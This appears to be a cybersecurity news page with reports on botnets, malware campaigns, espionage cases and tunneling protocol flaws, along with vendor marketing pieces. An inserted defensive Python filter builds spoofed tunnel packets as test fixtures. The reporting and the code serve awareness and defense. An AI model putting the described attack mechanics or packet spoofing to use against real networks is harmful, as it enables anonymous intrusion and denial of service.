The Hacker News
Most trusted, widely-read infosec source of the latest hacking news, cyberattacks, computer security, and cybersecurity for ethical hackers, penetration testers, and information technology professionals. Contact — admin@thehackernews.com
Recent Updates
  • 13,000 MikroTik Routers Hijacked by Botnet for Malspam and Cyberattacks
    thehackernews.com
    A global network of about 13,000 hijacked MikroTik routers has been employed as a botnet to propagate malware via spam campaigns, the latest addition to a list of botnets powered by MikroTik devices.

    The activity "take[s] advantage of misconfigured DNS records to pass email protection techniques," Infoblox security researcher David Brunsdon said in a technical report published last week. "This botnet uses a global network of Mikrotik routers to send malicious emails that are designed to appear to come from legitimate domains."

    The DNS security company, which has codenamed the campaign Mikro Typo, said its analysis sprang forth from the discovery of a malspam campaign in late November 2024 that leveraged freight invoice-related lures to entice recipients into launching a ZIP archive payload.

    The ZIP file contains an obfuscated JavaScript file, which is then responsible for running a PowerShell script designed to initiate an outbound connection to a command-and-control (C2) server located at the IP address 62.133.60[.]137.

    The exact initial access vector used to infiltrate the routers is unknown, but various firmware versions have been affected, including those vulnerable to CVE-2023-30799, a critical privilege escalation issue that could be abused to achieve arbitrary code execution.

    "Regardless of how they've been compromised, it seems as though the actor has been placing a script onto the [Mikrotik] devices that enables SOCKS (Secure Sockets), which allow the devices to operate as TCP redirectors," Brunsdon said. "Enabling SOCKS effectively turns each device into a proxy, masking the true origin of malicious traffic and making it harder to trace back to the source."

    Elevating the concern is the lack of authentication required to use these proxies, thereby allowing other threat actors to weaponize specific devices or the entire botnet for malicious purposes, ranging from distributed denial-of-service (DDoS) attacks to phishing campaigns.

    The malspam campaign in question has been found to exploit a misconfiguration in the sender policy framework (SPF) TXT records of 20,000 domains, giving the attackers the ability to send emails on behalf of those domains and bypass various email security protections.

    Specifically, it has emerged that the SPF records are configured with the extremely permissive "+all" option, essentially defeating the purpose of having the safeguard in the first place. This also means that any device, such as the compromised MikroTik routers, can spoof the legitimate domain in email.

    MikroTik device owners are recommended to keep their routers up-to-date and change default account credentials to prevent any exploitation attempts.

    "With so many compromised MikroTik devices, the botnet is capable of launching a wide range of malicious activities, from DDoS attacks to data theft and phishing campaigns," Brunsdon said. "The use of SOCKS4 proxies further complicates detection and mitigation efforts, highlighting the need for robust security measures."
  • Mirai Variant Murdoc_Botnet Exploits AVTECH IP Cameras and Huawei Routers
    thehackernews.com
    Jan 21, 2025 · Ravie Lakshmanan · Botnet / Vulnerability

    Cybersecurity researchers have warned of a new large-scale campaign that exploits security flaws in AVTECH IP cameras and Huawei HG532 routers to rope the devices into a Mirai botnet variant dubbed Murdoc_Botnet.

    The ongoing activity "demonstrates enhanced capabilities, exploiting vulnerabilities to compromise devices and establish expansive botnet networks," Qualys security researcher Shilpesh Trivedi said in an analysis.

    The campaign is known to be active since at least July 2024, with over 1,370 systems infected to date. A majority of the infections have been located in Malaysia, Mexico, Thailand, Indonesia, and Vietnam.

    Evidence shows that the botnet leverages known security flaws such as CVE-2017-17215 and CVE-2024-7029 to gain initial access to the Internet of Things (IoT) devices and download the next stage payload by means of a shell script. The script, for its part, fetches the botnet malware and executes it depending on the CPU architecture. The end goal of these attacks is to weaponize the botnet for carrying out distributed denial-of-service (DDoS) attacks.

    The development comes weeks after a Mirai botnet variant named gayfemboy was found exploiting a recently disclosed security flaw impacting Four-Faith industrial routers since early November 2024. Back in mid-2024, Akamai also revealed that CVE-2024-7029 was abused by malicious actors to enlist AVTECH devices into a botnet.

    Last week, details emerged about another large-scale DDoS attack campaign targeting major Japanese corporations and banks since the end of 2024 by making use of an IoT botnet formed by exploiting vulnerabilities and weak credentials. Some of the other targets are concentrated around the U.S., Bahrain, Poland, Spain, Israel, and Russia.

    The DDoS activity has been found to single out telecommunications, technology, hosting, cloud computing, banking, gaming, and financial services sectors. Over 55% of the compromised devices are located in India, followed by South Africa, Brazil, Bangladesh, and Kenya.

    "The botnet comprises malware variants derived from Mirai and BASHLITE," Trend Micro said. "The botnet's commands include those that can incorporate various DDoS attack methods, update malware, and enable proxy services."

    The attacks involve infiltrating IoT devices to deploy a loader malware that fetches the actual payload, which then connects to a command-and-control (C2) server and awaits further instructions for DDoS attacks and other purposes.

    To safeguard against such attacks, it's advised to monitor suspicious processes, events, and network traffic spawned by the execution of any untrusted binary/scripts. It's also recommended to apply firmware updates and change the default username and password.
  • Ex-CIA Analyst Pleads Guilty to Sharing Top-Secret Data with Unauthorized Parties
    thehackernews.com
    Jan 21, 2025 · Ravie Lakshmanan · Cyber Espionage / Surveillance

    A former analyst working for the U.S. Central Intelligence Agency (CIA) pleaded guilty to transmitting top secret National Defense Information (NDI) to individuals who did not have the necessary authorization to receive it and attempted to cover up the activity.

    Asif William Rahman, 34, of Vienna, was an employee of the CIA since 2016 and had a Top Secret security clearance with access to Sensitive Compartmented Information (SCI). He was charged with two counts of unlawfully transmitting NDI in November 2024 following his arrest.

    He has pleaded guilty to two counts of willful retention and transmission of classified information related to the national defense. He is expected to be sentenced on May 15, 2025, potentially facing a maximum penalty of 10 years in prison.

    According to court filings, Rahman is alleged to have retained without authorization two documents classified as Top Secret on or about October 17, 2024, and delivered them to multiple individuals who were not entitled to receive them.

    "In the spring of 2024, the defendant accessed and printed from his workstation approximately five documents. These documents were classified at the Secret and Top Secret level," court documents filed on January 17, 2025, reveal. "The defendant transported those materials outside of his place of employment and to his residence by concealing those materials inside a backpack."

    "From his residence in the Eastern District of Virginia, the defendant reproduced the documents and, while doing so, altered them in an effort to conceal their source and his activity. The defendant then communicated Top Secret information he learned in the course of his employment to multiple individuals he knew were not entitled to receive it. He also transmitted the reproductions of the Secret and Top Secret documents to multiple individuals he knew were not entitled to receive them."

    Rahman is also said to have shared an additional 10 documents classified at the Top Secret level in a similar manner in the fall of 2024. Then on October 17, he printed two more Top Secret documents pertaining to a United States ally and its planned kinetic actions against a foreign adversary.

    The defendant then proceeded to photograph these documents from his residence and used a computer program to edit the images. The documents were then shared with unspecified people who were not supposed to receive them. These individuals are believed to have shared the information with others, eventually causing the documents to appear on several social media platforms on October 18.

    While the names of the countries were not disclosed, multiple reports from Axios and CNN revealed around that time that the release was linked to Israel's plans to attack Iran. The documents, prepared by the National Geospatial-Intelligence Agency and the National Security Agency, were posted on Telegram by an account called Middle East Spectator.

    Rahman has also been accused of deleting the files and altering journal entries and written work products on his personal electronic devices in an effort to conceal his personal opinions on U.S. policy. He further drafted entries to paint a false, seemingly benign narrative regarding his deletion of records on his personal device and the CIA workstation.

    "Government employees who are granted security clearances and given access to our nation's classified information must promise to protect it," said Executive Assistant Director Robert Wells of the Federal Bureau of Investigation's National Security Branch. "Rahman blatantly violated that pledge and took multiple steps to hide his actions."

    Philippines Arrests Chinese National and 2 Filipinos for Espionage

    The development comes as the Philippines' National Bureau of Investigation (NBI) disclosed the arrest of a Chinese national and two Filipino citizens suspected of conducting surveillance on critical infrastructure facilities for over a month.

    The three individuals, Deng Yuanqing, Ronel Jojo Balundo Besa and Jayson Amado Fernandez, are part of a group consisting of six members who engage in surveillance operations by unlawfully obtaining sensitive information related to national defense. The remaining three members, two hardware engineers and a financier (aka Wang), are currently in China, the agency added.

    Deng, per the NBI, is a software engineer with specialization in automation and control engineering and is allegedly affiliated with the PLA University Science and Technology, a Nanjing-based academic institution under the control of China's People's Liberation Army (PLA).

    The investigation also uncovered that a white vehicle was procured and fitted with information and communications technology (ICT) equipment so as to facilitate the Intelligence, Surveillance, and Reconnaissance (ISR) operation.

    "From December 13, 2024 to January 16, 2025, subject vehicle was monitored traversing to and fro the National Capital Region and the general divisions of Luzon, conducting detailed scouting, collating comprehensive image of the terrains and structures and the over-all topography of the potential targets, without consent and authority from the Philippine Government," the NBI said.

    The agency also noted that an onsite search led to the discovery of a Chinese character user account with device ID 918 452 619 controlling the computer system inside the subject vehicle, such as the portable keyboard, files, and cameras.

    The Philippines has been a target of several Chinese threat actors in recent years, primarily driven by geopolitical tensions in Southeast Asia over ongoing territorial disputes in the South China Sea.
  • HackGATE: Setting New Standards for Visibility and Control in Penetration Testing Projects
    thehackernews.com
    Jan 21, 2025 · The Hacker News

    Imagine receiving a penetration test report that leaves you with more questions than answers. Questions like, "Were all functionalities of the web app tested?" or "Were there any security issues that could have been identified during testing?" often go unresolved, raising concerns about the thoroughness of the security testing. This frustration is common among many security teams. Pentest reports, while crucial, frequently lack the depth and detail necessary to truly assess the success of the project.

    Even with years of experience working with cybersecurity teams and managing ethical hacking projects, we frequently encountered these same issues. Whether collaborating with external pentest providers or managing our own projects as founders of Hackrate, we often faced difficulties in ensuring that the testing was as comprehensive as it needed to be.

    This realization inspired us to create HackGATE, a managed gateway solution built to bring transparency and control to pentesting projects, ensuring no questions are left unanswered about the quality and thoroughness of the penetration test projects. We aimed to not only address our own challenges but also to provide the cybersecurity industry with a powerful tool to enhance visibility in their ethical hacking projects.

    Common Challenges in Penetration Testing

    1. Lack of visibility and control

    A recent survey on pentest projects revealed that 60% of security professionals struggle to measure the success of their pentests. Additionally, nearly two-thirds (65%) of respondents rely solely on information provided by the pentest vendor. This highlights a significant gap in the cybersecurity landscape: the lack of a solution offering visibility into pentesting activities. Without such a solution, security teams struggle with limited insight into crucial aspects of the testing process, including the overall scope and duration of the tests, the specific techniques and attack vectors employed, and the detailed steps taken by ethical hackers.

    2. Dependence on the final pentest report

    Most companies that outsource pentests depend on a final report and their trust in the pentest vendor to assess success. Without concrete evidence of the various aspects of the testing, security teams are left with concerns and security blind spots, encountering obstacles both in understanding their security testing projects and in communicating their outcomes to leadership and stakeholders.

    3. Coordination in remote pentester teams

    Managing a globally distributed team, particularly when working across different time zones, adds to these challenges. This can lead to delays in communication and coordination, resulting in missed deadlines and incomplete tasks. Ensuring that all team members adhere to the same standards across various locations is also challenging. Inconsistent practices can lead to gaps in pentest coverage, leaving critical vulnerabilities undiscovered.

    How HackGATE Addresses These Challenges

    1. Enhanced visibility and detailed insights

    HackGATE provides real-time visibility into pentest activities. For instance, it details the security testing traffic sent to targets, highlights targeted testing areas, and outlines the methods used by ethical hackers. This transparency ensures you can track the security testing process effectively.

    2. Establishing a quality framework for ethical hacking

    To ensure the quality of the testing process, it is crucial to establish controls based on analyzed data. Ethical hackers use guidelines and best practices, such as the OWASP guidelines, to provide a structured approach to identifying security risks. While OWASP's framework offers a thorough evaluation of web applications, auditing the security tests is still necessary to verify that pentesters are truly following the guidelines.

    HackGATE ensures the effectiveness of penetration tests by establishing baselines for minimum testing traffic, which includes both manual and automated testing activities. This ensures thoroughness and consistency in assessments.

    3. Consolidated and visualized data

    Penetration tests generate large volumes of data, which can be difficult to analyze and understand with traditional Security Operation Center solutions. Teams need a centralized dashboard that consolidates key insights, showing the most important metrics, so all stakeholders can easily keep up with progress and monitor ethical hacking activities.

    HackGATE's unified dashboard addresses this need by consolidating critical insights into a single view. It includes features for project management, analytics, and a detailed overview of pentester activities. This allows all stakeholders to easily access and understand the key metrics without sifting through disparate sources.

    4. Better coordination across distributed security teams

    By providing a unified interface for all team members, HackGATE ensures that everyone adheres to the same standards, reducing inconsistencies in pentest coverage. The platform also supports comprehensive scope coverage by enabling accurate and detailed reporting, ensuring that all intended assets are tested and documented.

    HackGATE also enhances accountability by automatically generating detailed reports, providing evidence of testing. This not only helps in holding team members accountable but also simplifies the audit process, ensuring regulatory compliance with a clear and accessible audit trail.

    HackGATE approach

    To ensure successful penetration testing initiatives, security teams need to adopt the 'Trust but Verify' principle in penetration tests. This means that instead of relying solely on their pentest provider's report, they need to be able to verify the quality and thoroughness of the testing. But how can they achieve this? The 'Trust but Verify' approach requires accurate data, effective monitoring, and detailed reporting. Most companies still struggle due to the lack of methodology and tools.

    Conclusion

    To ensure your penetration testing projects are comprehensive and compliant, consider integrating innovative monitoring tools like HackGATE into your cybersecurity strategy. For a more in-depth understanding of how it can address your specific needs, schedule a consultation with our technical experts - no sales pitch, just a detailed exploration of how our solution can enhance your pentest approach. Visit the HackGATE website to get started or arrange your personalized technical consultation.

    This article is a contributed piece from one of our valued partners.
  • PNGPlug Loader Delivers ValleyRAT Malware Through Fake Software Installers
    thehackernews.com
    Jan 21, 2025 · Ravie Lakshmanan · Cyber Attack / Windows Security

    Cybersecurity researchers are calling attention to a series of cyber attacks that have targeted Chinese-speaking regions like Hong Kong, Taiwan, and Mainland China with a known malware called ValleyRAT.

    The attacks leverage a multi-stage loader dubbed PNGPlug to deliver the ValleyRAT payload, Intezer said in a technical report published last week.

    The infection chain commences with a phishing page that's designed to encourage victims to download a malicious Microsoft Installer (MSI) package disguised as legitimate software. Once executed, the installer deploys a benign application to avoid arousing suspicion, while also stealthily extracting an encrypted archive containing the malware payload.

    "The MSI package uses the Windows Installer's CustomAction feature, enabling it to execute malicious code, including running an embedded malicious DLL that decrypts the archive (all.zip) using a hardcoded password 'hello202411' to extract the core malware components," security researcher Nicole Fishbein said.

    These include a rogue DLL ("libcef.dll"), a legitimate application ("down.exe") that's used as a cover to conceal the malicious activities, and two payload files masquerading as PNG images ("aut.png" and "view.png").

    The main objective of the DLL loader, PNGPlug, is to prepare the environment for executing the main malware by injecting "aut.png" and "view.png" into memory in order to set up persistence by making Windows Registry changes and executing ValleyRAT, respectively.

    ValleyRAT, detected in the wild since 2023, is a remote access trojan (RAT) that's capable of providing attackers with unauthorized access and control over infected machines. Recent versions of the malware have incorporated features to capture screenshots and clear Windows event logs.

    It's assessed to be linked to a threat group called Silver Fox, which also shares tactical overlaps with another activity cluster named Void Arachne owing to the use of a command-and-control (C&C) framework called Winos 4.0.

    The campaign is unique for its focus on the Chinese-speaking demographic and the use of software-related lures to activate the attack chain.

    "Equally striking is the attackers' sophisticated use of legitimate software as a delivery mechanism for malware, seamlessly blending malicious activities with seemingly benign applications," Fishbein said. "The adaptability of the PNGPlug loader further elevates the threat, as its modular design allows it to be tailored for multiple campaigns."
  • CERT-UA Warns of Cyber Scams Using Fake AnyDesk Requests for Fraudulent Security Audits
    thehackernews.com
    Jan 21, 2025 · Ravie Lakshmanan · Malware / Cyber Threat

    The Computer Emergency Response Team of Ukraine (CERT-UA) is warning of ongoing attempts by unknown threat actors to impersonate the cybersecurity agency by sending AnyDesk connection requests.

    The AnyDesk requests claim to be for conducting an audit to assess the "level of security," CERT-UA added, cautioning organizations to be on the lookout for such social engineering attempts that seek to exploit user trust.

    "It is important to note that CERT-UA may, under certain circumstances, use remote access software such as AnyDesk," CERT-UA said. "However, such actions are taken only after prior agreement with the owners of objects of cyber defense through officially approved communication channels."

    However, for this attack to succeed, it's necessary that the AnyDesk remote access software is installed and operational on the target's computer. It also requires the attacker to be in possession of the target's AnyDesk identifier, suggesting that they may have to first obtain the identifier through other methods.

    To mitigate the risk posed by these attacks, it's essential that remote access programs are enabled only for the duration of their use and the remote access is coordinated through official communication channels.

    News of the campaign comes as Ukraine's State Service for Special Communications and Information Protection (SSSCIP) revealed that the cyber agency's incident response center detected over 1,042 incidents in 2024, with malicious code and intrusion efforts accounting for more than 75% of all the events.

    "In 2024, the most active cyber threat clusters were UAC-0010, UAC-0050, and UAC-0006, specializing in cyber espionage, financial theft, and information-psychological operations," the SSSCIP said.

    UAC-0010, also known as Aqua Blizzard and Gamaredon, is estimated to be behind 277 incidents. UAC-0050 and UAC-0006 have been found to be linked to 99 and 174 incidents, respectively.

    The development also follows the discovery of 24 previously unreported .shop top-level domains likely associated with the pro-Russian hacking group known as GhostWriter (aka TA445, UAC-0057, and UNC1151) by connecting disparate campaigns targeting Ukraine last year.

    An analysis undertaken by security researcher Will Thomas (@BushidoToken) found that the domains used in these campaigns used the same generic top-level domain (gTLD), the PublicDomainsRegistry registrar, and Cloudflare name servers. All the identified servers also have a robots.txt directory configured.

    As the Russo-Ukrainian war approaches the end of its third year, cyber-attacks have also been recorded against Russia with an aim to steal sensitive data and disrupt business operations by deploying ransomware.

    Last week, cybersecurity company F.A.C.C.T. attributed the Sticky Werewolf actor to a spear-phishing campaign directed against Russian research and production enterprises to deliver a remote access trojan known as Ozone that's capable of granting remote access to infected Windows systems.

    It also described Sticky Werewolf as a pro-Ukrainian cyberspy group that mainly singles out state institutions, research institutes, and industrial enterprises in Russia. However, a previous analysis from Israeli cybersecurity company Morphisec pointed out that this connection "remains uncertain."

    It's not known how successful these attacks were. Some of the other threat activity clusters that have been observed targeting Russian entities in recent months include Core Werewolf, Venture Wolf, and Paper Werewolf (aka GOFFEE), the last of which has leveraged a malicious IIS module called Owowa to facilitate credential theft.
  • DoNot Team Linked to New Tanzeem Android Malware Targeting Intelligence Collection
    thehackernews.com
    Jan 20, 2025 · Ravie Lakshmanan · Android / Malware

    The threat actor known as DoNot Team has been linked to a new Android malware as part of highly targeted cyber attacks.

    The artifacts in question, named Tanzeem (meaning "organization" in Urdu) and Tanzeem Update, were spotted in October and December 2024 by cybersecurity company Cyfirma. The apps in question have been found to incorporate identical functions, barring minor modifications to the user interface.

    "Although the app is supposed to function as a chat application, it does not work once installed, shutting down after the necessary permissions are granted," Cyfirma noted in a Friday analysis. "The app's name suggests that it is designed to target specific individuals or groups both inside and outside the country."

    DoNot Team, also tracked as APT-C-35, Origami Elephant, SECTOR02, and Viceroy Tiger, is a hacking group believed to be of Indian origin, with historical attacks leveraging spear-phishing emails and Android malware families to gather information of interest.

    In October 2023, the threat actor was linked to a previously undocumented .NET-based backdoor called Firebird targeting a handful of victims in Pakistan and Afghanistan.

    It's currently not clear who the exact targets of the latest malware were, although it's suspected that they were used against specific individuals with the aim of intelligence gathering against internal threats.

    A notable aspect of the malicious Android app is the use of OneSignal, a popular customer engagement platform used by organizations to send push notifications, in-app messages, emails, and SMS messages. Cyfirma theorized that the library is being abused to send notifications containing phishing links that lead to malware deployment.

    Regardless of the distribution mechanism used, the app displays a fake chat screen upon installation and urges the victim to click a button named "Start Chat." Doing so triggers a message that instructs the user to grant permissions to the accessibility services API, thus allowing it to perform various nefarious actions.

    The app also requests access to several sensitive permissions that facilitate the collection of call logs, contacts, SMS messages, precise locations, account information, and files present in external storage. Some of the other features include capturing screen recordings and establishing connections to a command-and-control (C2) server.

    "The collected samples reveal a new tactic involving push notifications that encourage users to install additional Android malware, ensuring the persistence of the malware on the device," Cyfirma said. "This tactic enhances the malware's ability to remain active on the targeted device, indicating the threat group's evolving intentions to continue participating in intelligence gathering for national interests."
  • Unsecured Tunneling Protocols Expose 4.2 Million Hosts, Including VPNs and Routers
    thehackernews.com
    Jan 20, 2025 | Ravie Lakshmanan | Network Security / Vulnerability

New research has uncovered security vulnerabilities in multiple tunneling protocols that could allow attackers to perform a wide range of attacks.

"Internet hosts that accept tunneling packets without verifying the sender's identity can be hijacked to perform anonymous attacks and provide access to their networks," Top10VPN said in a study, as part of a collaboration with KU Leuven professor and researcher Mathy Vanhoef.

As many as 4.2 million hosts have been found susceptible to the attacks, including VPN servers, ISP home routers, core internet routers, mobile network gateways, and content delivery network (CDN) nodes. China, France, Japan, the U.S., and Brazil top the list of the most affected countries.

Successful exploitation of the shortcomings could permit an adversary to abuse a susceptible system as a one-way proxy, as well as conduct denial-of-service (DoS) attacks.

"An adversary can abuse these security vulnerabilities to create one-way proxies and spoof source IPv4/6 addresses," the CERT Coordination Center (CERT/CC) said in an advisory. "Vulnerable systems may also allow access to an organization's private network or be abused to perform DDoS attacks."

The vulnerabilities are rooted in the fact that tunneling protocols such as IP6IP6, GRE6, 4in6, and 6in4, which are mainly used to facilitate data transfers between two disconnected networks, neither authenticate nor encrypt traffic unless they are wrapped in an adequate security protocol such as Internet Protocol Security (IPsec).

The absence of additional security guardrails opens the door to a scenario where an attacker can inject malicious traffic into a tunnel, a variation of a flaw that was previously flagged in 2020 (CVE-2020-10136).

They have been assigned the following CVE identifiers for the protocols in question:

- CVE-2024-7595 (GRE and GRE6)
- CVE-2024-7596 (Generic UDP Encapsulation)
- CVE-2025-23018 (IPv4-in-IPv6 and IPv6-in-IPv6)
- CVE-2025-23019 (IPv6-in-IPv4)

"An attacker simply needs to send a packet encapsulated using one of the affected protocols with two IP headers," Top10VPN's Simon Migliano explained. "The outer header contains the attacker's source IP with the vulnerable host's IP as the destination. The inner header's source IP is that of the vulnerable host IP rather than the attacker. The destination IP is that of the target of the anonymous attack."

Thus, when the vulnerable host receives the malicious packet, it automatically strips the outer IP header and forwards the inner packet to its destination. Because the source IP address on the inner packet is that of the vulnerable but trusted host, the packet is able to get past network filters.

As defenses, it's recommended to use IPsec or WireGuard to provide authentication and encryption, and to only accept tunneling packets from trusted sources. At the network level, it's also advised to implement traffic filtering on routers and middleboxes, carry out deep packet inspection (DPI), and block all unencrypted tunneling packets.

"The impact on victims of these DoS attacks can include network congestion, service disruption as resources are consumed by the traffic overload, and crashing of overloaded network devices," Migliano said. "It also opens up opportunities for further exploitation, such as man-in-the-middle attacks and data interception."
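One way to apply the two host-level defenses described above, as an added example that is not part of the original article or of any vendor's code: a small Python ingress filter that parses IPIP, 6in4 and GRE encapsulation, accepts tunnel packets only from configured peers, and drops any packet whose inner source address is the host's own (the two-header pattern Migliano describes). All function names, addresses and sample packets are constructed for illustration.

```python
"""Ingress filter for unauthenticated IP tunnels (IPIP, 6in4, GRE).

Added example for the tunneling advisory above, not code from Top10VPN, CERT/CC or
any vendor. It applies two of the advisory's host-level defenses: accept tunnel
packets only from an allow-list of trusted outer sources, and drop any packet whose
inner source is one of this host's own addresses, the double-header pattern that
turns the host into a one-way proxy. Sample packets are constructed for the test.
"""
import ipaddress
import struct

IPPROTO_IPIP, IPPROTO_IPV6, IPPROTO_GRE = 4, 41, 47     # IPv4-in-IPv4, 6in4, GRE
TUNNEL_PROTOS = {IPPROTO_IPIP, IPPROTO_IPV6, IPPROTO_GRE}
ETHERTYPE_IPV4, ETHERTYPE_IPV6 = 0x0800, 0x86DD


def parse_ipv4(buf):
    """Return (src, dst, proto, header_len) for an IPv4 header, or None if malformed."""
    if len(buf) < 20 or buf[0] >> 4 != 4:
        return None
    ihl = (buf[0] & 0x0F) * 4
    if ihl < 20 or len(buf) < ihl:
        return None
    return ipaddress.IPv4Address(buf[12:16]), ipaddress.IPv4Address(buf[16:20]), buf[9], ihl


def parse_ipv6(buf):
    """Return (src, dst) for an IPv6 header, or None if malformed."""
    if len(buf) < 40 or buf[0] >> 4 != 6:
        return None
    return ipaddress.IPv6Address(buf[8:24]), ipaddress.IPv6Address(buf[24:40])


def parse_gre(buf):
    """Return (ethertype, header_len) for a version-0 GRE header (RFC 2784/2890), or None."""
    if len(buf) < 4:
        return None
    flags, ethertype = struct.unpack("!HH", buf[:4])
    if flags & 0x0007:                     # version field must be 0
        return None
    # optional 4-byte words: checksum+reserved (C bit), key (K bit), sequence (S bit)
    hdr = 4 + 4 * bool(flags & 0x8000) + 4 * bool(flags & 0x2000) + 4 * bool(flags & 0x1000)
    return (ethertype, hdr) if len(buf) >= hdr else None


def inner_addresses(proto, payload):
    """Source and destination of the encapsulated packet, or None if unparseable."""
    if proto == IPPROTO_GRE:               # GRE: skip its header, then parse the carried IP packet
        gre = parse_gre(payload)
        if gre is None:
            return None
        proto = {ETHERTYPE_IPV4: IPPROTO_IPIP, ETHERTYPE_IPV6: IPPROTO_IPV6}.get(gre[0])
        payload = payload[gre[1]:]
    if proto == IPPROTO_IPIP:
        inner = parse_ipv4(payload)
        return None if inner is None else inner[:2]
    if proto == IPPROTO_IPV6:
        return parse_ipv6(payload)
    return None


def filter_tunnel_packet(raw, local_addrs, trusted_peers):
    """Classify an outer IPv4 packet as 'pass' (not a tunnel), 'accept' or 'drop:<reason>'."""
    outer = parse_ipv4(raw)
    if outer is None:
        return "drop:malformed-outer"
    src, _dst, proto, ihl = outer
    if proto not in TUNNEL_PROTOS:
        return "pass"
    if src not in trusted_peers:           # defense 1: the sender must be a configured peer
        return "drop:untrusted-outer-source"
    inner = inner_addresses(proto, raw[ihl:])
    if inner is None:
        return "drop:malformed-inner"
    if inner[0] in local_addrs:            # defense 2: never relay a packet claiming to be us
        return "drop:inner-source-is-local"
    return "accept"


def make_ipv4_header(src, dst, proto, total_len):
    """Constructed test header; the checksum is left zero because the filter never checks it."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, proto, 0,
                       ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)


# Constructed scenario using RFC 5737 documentation ranges: this host is 198.51.100.10
# and 198.51.100.20 is its only legitimate tunnel peer.
LOCAL = {ipaddress.IPv4Address("198.51.100.10")}
TRUSTED = {ipaddress.IPv4Address("198.51.100.20")}
INNER_SPOOF = make_ipv4_header("198.51.100.10", "192.0.2.77", 6, 20)   # inner src is this host
INNER_SITE = make_ipv4_header("10.20.0.5", "10.10.0.9", 6, 20)          # ordinary site-to-site
SPOOF_FROM_UNTRUSTED = make_ipv4_header("203.0.113.5", "198.51.100.10", IPPROTO_IPIP, 40) + INNER_SPOOF
SPOOF_FROM_TRUSTED = make_ipv4_header("198.51.100.20", "198.51.100.10", IPPROTO_IPIP, 40) + INNER_SPOOF
SPOOF_VIA_GRE = (make_ipv4_header("198.51.100.20", "198.51.100.10", IPPROTO_GRE, 44)
                 + struct.pack("!HH", 0, ETHERTYPE_IPV4) + INNER_SPOOF)
LEGITIMATE = make_ipv4_header("198.51.100.20", "198.51.100.10", IPPROTO_IPIP, 40) + INNER_SITE

if __name__ == "__main__":
    for name, pkt in [("spoof, untrusted peer", SPOOF_FROM_UNTRUSTED), ("spoof, trusted peer", SPOOF_FROM_TRUSTED),
                      ("spoof, GRE", SPOOF_VIA_GRE), ("legitimate", LEGITIMATE)]:
        print(f"{name:22s} -> {filter_tunnel_packet(pkt, LOCAL, TRUSTED)}")
```

The peer allow-list alone does not stop the spoof when a trusted peer is itself compromised, which is why the inner-source check is applied even to accepted peers.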
  • Product Walkthrough: How Satori Secures Sensitive Data From Production to AI
    thehackernews.com
    Jan 20, 2025 | The Hacker News | Data Security / Data Monitoring

Every week seems to bring news of another data breach, and it's no surprise why: securing sensitive data has become harder than ever. And it's not just because companies are dealing with orders of magnitude more data. Data flows and user roles are constantly shifting, and data is stored across multiple technologies and cloud environments. Not to mention, compliance requirements are only getting stricter and more elaborate.

The problem is that while the data landscape has evolved rapidly, the usual strategies for securing that data are stuck in the past. Gone are the days when data lived in predictable places, with access controlled by a chosen few. Today, practically every department in the business needs to use customer data, and AI adoption means huge datasets and a constant flux of permissions, use cases, and tools. Security teams are struggling to implement effective strategies for securing sensitive data, and a new crop of tools, called data security platforms, has appeared on the scene in the past few years to address the gap.

One of these players, Satori, claims its data security platform can "secure all data, from production to AI". We wanted to investigate this claim. But first, what does that even mean for security teams? Let's break it down into two parts: "secure all data" and "from production to AI."

Secure all data

When Satori says it secures all data, it means that unlike other data security platforms, Satori focuses on securing every type of data within an organization, not just a specific subset. Legacy data security solutions, including DSPM (Data Security Posture Management) platforms, primarily focus on securing analytical data, that is, data typically used for business intelligence or reporting. However, Satori extends its security to cover operational data, semi-structured data, and other data types that other platforms may overlook. This comprehensive approach ensures that not only is your analytical data secure, but all forms of data, including semi-structured, are protected throughout their lifecycle.

From Production to AI

"From production to AI" refers to the security of data across the entire pipeline, from its creation and use in production environments to its application in AI models and processes. This is where many data security solutions fall short. Legacy platforms often focus primarily on securing data in analytical environments like data lakes, warehouses, and lakehouses. But they often neglect operational or production data, where risks can arise.

For example, developers or engineers may need temporary access to production databases to address issues or perform maintenance. Without proper safeguards, giving them access can lead to over-privileged access, making them an internal threat. Satori's approach helps mitigate this risk by ensuring that access to sensitive production data is tightly controlled, even for temporary or emergency situations.

Furthermore, legacy data security solutions neglect BI tools, leaving implementation of row-level security on these tools to security teams - not a simple task. Satori, on the other hand, supports fine-grained access control on BI tools, allowing security teams to manage access to them alongside data stores.

So how does it work?

You can't secure data if you don't know what data you have and where it's located. Satori combines the visibility capabilities offered by DSPMs, which security teams need in order to secure customer data. This makes it easy to answer the primary data security questions across databases, data warehouses, and data lakes:

- Where are my data assets (databases, warehouses, etc.)? Satori continuously discovers and monitors data assets.
- Where is my sensitive data? Satori continuously classifies data and tags it with appropriate data type tags.
- Who has access to what data? Satori analyzes your data store configuration to give you data access governance and understand which users have access to what data.
- Who has access to what sensitive data? When combined with Satori's continuous data discovery and classification, you know who has access to a specific database or table and what types of sensitive data are used.
- Who is doing what, with what data? Satori gives you complete Data Activity Monitoring across all your data stores in a central location. You can easily enrich audit logs by creating customized access log reports for platforms like Splunk, Snowflake, DataDog, or Elastic. That way, you know exactly what users were doing with the data, who approved these activities, and what security policies were applied.

In Satori, data stores are discovered automatically by scanning cloud accounts or added directly in the management console, via API or with Terraform. Connect all of your cloud accounts to Satori and receive notifications for all of the new data stores and data assets added to them.

Once discovered, data stores are continuously monitored to produce a full inventory of the data assets they contain, classified to the column level with a broad set of out-of-the-box or customer-built classifiers. A mapping of the permissions structure is performed to clearly show which users have access to what data assets. Finally, any risky misconfiguration that may degrade their security posture is detected, with alerts produced for the relevant teams to remediate.

Teams can use Satori's posture manager to get an overview of your organization's database user permissions over time.

More than visibility

Most security teams go about tackling the data security challenge in a sequential process:

1. Map out your data
2. Identify who has access to what data
3. Apply controls to reduce risk and meet compliance requirements

The problem with this approach is that teams often get stuck in step 1, getting caught in a loop as new data stores and users are introduced. Satori overhauls this process by introducing automation at every step. Both the work of discovering and classifying data and the enforcement of security policies happen in real time, adjusting automatically as new data stores are added.

Satori makes it easy to enforce the appropriate security controls at scale, using:

- RBAC (role-based access control) and ABAC (attribute-based access control): Satori allows organizations to apply RBAC and ABAC universally, even on platforms that do not have such native support. You can create masking profiles, which can then be used to create dynamic masking policies.
- Temporary data access: When users need access to data, they can get it automatically for a set amount of time. This relieves the organization of over-privileged data access, one of the main root causes of sensitive data exposure.
- Fine-grained access control across multiple data stores: For example, you can apply data masking to your Snowflake cloud data, as well as your MSSQL and Postgres databases.
